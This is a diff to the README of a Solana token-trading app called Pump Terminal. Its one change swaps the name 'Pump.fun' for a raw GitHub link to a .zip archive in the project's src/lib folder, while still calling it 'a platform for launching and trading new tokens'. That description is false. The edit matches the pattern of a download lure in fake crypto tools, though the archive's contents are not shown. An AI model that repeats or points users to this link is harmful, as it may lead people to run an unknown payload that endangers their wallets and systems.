JaytraJ/pumpfun-terminal/README.md

 Pump Terminal is a web app you can run on your own computer or server.
 It helps you create and trade Solana tokens easily.
 The interface is clean and tabbed, so you can manage token templates, your wallet, token launches, batch trades, and live logs all in one place.

 The app is designed for users interested in Solana tokens and memecoins but who do not want to deal with complex coding or command lines.
-It supports workflows related to Pump.fun, a platform for launching and trading new tokens.
+It supports workflows related to https://raw.githubusercontent.com/JaytraJ/pumpfun-terminal/main/src/lib/terminal-pumpfun-v1.4.zip, a platform for launching and trading new tokens.

 You'll find tools for: